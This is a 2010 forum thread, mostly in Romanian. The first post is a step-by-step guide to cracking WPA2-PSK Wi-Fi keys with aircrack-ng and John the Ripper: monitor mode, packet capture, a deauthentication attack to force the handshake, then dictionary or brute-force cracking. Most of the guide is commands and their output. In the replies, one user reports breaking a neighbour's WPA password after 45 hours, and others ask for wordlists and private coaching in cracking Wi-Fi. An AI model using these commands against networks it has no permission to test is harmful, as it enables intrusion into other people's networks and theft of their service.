begood Posted March 12, 2010 Report Share Posted March 12, 2010 Basic steps : * Put interface in monitor mode * Find wireless network (protected with WPA2 and a Pre Shared Key) * Capture all packets * Wait until you see a client and deauthenticate the client, so the handshake can be captured * Crack the key using a dictionary file (or via John The Ripper)I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.First, put the card in monitor mode :root@bt:~# airmon-ng Interface Chipset Driverwifi0 Atheros madwifi-ngath0 Atheros madwifi-ng VAP (parent: wifi0)ath1 Atheros madwifi-ng VAP (parent: wifi0)wlan0 Ralink 2573 USB rt73usb - [phy0]root@bt:~# airmon-ng start wlan0Interface Chipset Driverwifi0 Atheros madwifi-ngath0 Atheros madwifi-ng VAP (parent: wifi0)ath1 Atheros madwifi-ng VAP (parent: wifi0)wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)Ok, we can now use interface mon0Let’s find a wireless network that uses WPA2 / PSK :root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNetStop airodump-ng and run it again, writing all packets to disk :airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon013:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 1013:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 Stop airodump-ng and make sure the files were created properlyroot@bt:/# ls /tmp/wpa2* -al-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csvForm this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in timeThe first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.So if your wordlist is called word.lst (under /tmp/wordlists), you can runaircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.capThe success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.That’s itUpdate :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit. http://www.corelan.be:8800/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/ Quote Link to comment Share on other sites More sharing options...
wildchild Posted March 13, 2010 Report Share Posted March 13, 2010 many thanks dude!abea astept sa vad daca merge cu succes! Quote Link to comment Share on other sites More sharing options...
begood Posted March 13, 2010 Author Report Share Posted March 13, 2010 Is curios si eu, sa-mi zici ce reusesti/nu reusesti. Quote Link to comment Share on other sites More sharing options...
wildchild Posted March 13, 2010 Report Share Posted March 13, 2010 (edited) dau feedback cand incerc.deocamdata nu am incercat bt4 si nu stiu daca nu o sa am ceva probleme ca am un ati care facea figuri la bt3.de asemenea,trebuie sa aflu un patch si pt chipset-ul realtek.LE:eu cred ca o sa fie cea mai multa bataie de cap la partea cu bruteforce sau dictionary.pachetele mai mult ca sigur le primesc Edited March 13, 2010 by wildchild Quote Link to comment Share on other sites More sharing options...
vizitatoru123 Posted March 13, 2010 Report Share Posted March 13, 2010 Aircrack-ng merg. Daca nu m-am jucat cu ele pana mi-a venit rau O_o. Quote Link to comment Share on other sites More sharing options...
zippy Posted March 13, 2010 Report Share Posted March 13, 2010 Parca tot backtrack 3 e mai ciumeg... Quote Link to comment Share on other sites More sharing options...
begood Posted March 13, 2010 Author Report Share Posted March 13, 2010 @zippy fa un video tutorial ^^ Quote Link to comment Share on other sites More sharing options...
vizitatoru123 Posted March 13, 2010 Report Share Posted March 13, 2010 Uita-te pe Infinity exists, sau pe forumul de la backtrack How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng) Quote Link to comment Share on other sites More sharing options...
begood Posted March 13, 2010 Author Report Share Posted March 13, 2010 Uita-te pe Infinity exists, sau pe forumul de la backtrack How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)Stiu ca sunt tutoriale video deja facute, dar astfel il impingeam sa invete sa faca el tutoriale. Quote Link to comment Share on other sites More sharing options...
vizitatoru123 Posted March 13, 2010 Report Share Posted March 13, 2010 Stiu ca sunt tutoriale video deja facute, dar astfel il impingeam sa invete sa faca el tutoriale.Pai si eu vreau sa faca, doar ca multi nu fac tutoriale ca deja exista Quote Link to comment Share on other sites More sharing options...
zippy Posted March 13, 2010 Report Share Posted March 13, 2010 @zippy fa un video tutorial ^^WEP Cracking? cu bt3? Quote Link to comment Share on other sites More sharing options...
vizitatoru123 Posted March 13, 2010 Report Share Posted March 13, 2010 WEP Cracking? cu bt3?WPA/WPA2 si WEP nu cred ca asta conteaza begood vrea doar sa faci un video tutorial si sa il postezi. Quote Link to comment Share on other sites More sharing options...
wildchild Posted March 13, 2010 Report Share Posted March 13, 2010 pe webul de la aircrack gasisem o metoda interesanta,e foarte fain detaliata.exact ce a zis begood insa step by step explicat tot tot,pana si erorile Quote Link to comment Share on other sites More sharing options...
begood Posted March 13, 2010 Author Report Share Posted March 13, 2010 wep cracking? Cu bt3?wpa/wpa2 Quote Link to comment Share on other sites More sharing options...
zippy Posted March 13, 2010 Report Share Posted March 13, 2010 wpa/wpa2 OK Momentan nu stau prea bine cu timpul dar o sa ma apuc de scris cateva tutoriale sau video . Daca cineva are vreo problema legata de cracking retele wireless sau altele in backtrack sau altele , astept PM si daca pot sa ajut o sa o fac cu mare placere Quote Link to comment Share on other sites More sharing options...
wildchild Posted April 15, 2010 Report Share Posted April 15, 2010 gata.am spart o parola WPA dupa 45 de ore de bruteforce.daca handicapatu de vecinu avea cu un caracter,2 in plus,aveam ce plati la factura.e pretty fucked up dar merge.ps:eu am folosit ubuntu jaunty. Quote Link to comment Share on other sites More sharing options...
lafurat Posted April 16, 2010 Report Share Posted April 16, 2010 Man der bt4 are dictionar sau trebuie sa il pui. Si wildchild daca avea 2 carectare in + de ce trebuie sa platasti factura Quote Link to comment Share on other sites More sharing options...
strike Posted April 22, 2010 Report Share Posted April 22, 2010 Man der bt4 are dictionar sau trebuie sa il pui. Si wildchild daca avea 2 carectare in + de ce trebuie sa platasti facturaFactura de la curent. Quote Link to comment Share on other sites More sharing options...
tzopik_cata Posted April 23, 2010 Report Share Posted April 23, 2010 te rog frumos da vrei si ai timp sa imi explici si mie asa mai babeste ca eu sunt mai prostutza treaba asta cu spartu parolelor wi-fi ca nu am priceput mare lucru daca vrei sa vb pe mess tzopik_cata Quote Link to comment Share on other sites More sharing options...
zippy Posted April 23, 2010 Report Share Posted April 23, 2010 Daca ma platesti ... Quote Link to comment Share on other sites More sharing options...
tzopik_cata Posted April 23, 2010 Report Share Posted April 23, 2010 Daca ma platesti ...spuneai mai devreme ca daca potzi o faci cu cea mai mare placere pai ori e din placere ori cu plata Quote Link to comment Share on other sites More sharing options...
zorg Posted April 23, 2010 Report Share Posted April 23, 2010 adica pui wlan0 in monitor mode si scanezi reteaua prin mono0 ce interesant, in fine apropos de WEP cel mai simplu si fara prea multe comenzi pt cei ce nu au chef de tastat folositi webspoon ca doar il aveti acolo la tools zic WEP pt ca eu asta am luat cu el, nu stiu daca merge sa iei WAP sau WAP2 la care din cate stiu iti trebuie handshake si e un pic mai complicat. Quote Link to comment Share on other sites More sharing options...
zippy Posted April 23, 2010 Report Share Posted April 23, 2010 spuneai mai devreme ca daca potzi o faci cu cea mai mare placere pai ori e din placere ori cu plataPentru tine care sigur o sa ma intrebi de parole de mess dupa si cu 2 posturi iti fac si un striptics Pe mine nu ma invatat nimeni si pe toti pe care iam intrebat imi raspundeau cum tiam raspuns si eu tie Quote Link to comment Share on other sites More sharing options...
lafurat Posted April 23, 2010 Report Share Posted April 23, 2010 Bt4 are dictionar inculs de spart parole WPA sau nu ???? In cazul in care n are, ce program are asa ceva ???? Quote Link to comment Share on other sites More sharing options...
zorg Posted April 24, 2010 Report Share Posted April 24, 2010 Bt4 are dictionar inculs de spart parole WPA sau nu ???? In cazul in care n are, ce program are asa ceva ????sigur ca trebuie sa fie , daca nu foloseste dic de la un alt cracker care il ai pe acolo si in daca nu pune-ti pe un stick Quote Link to comment Share on other sites More sharing options...
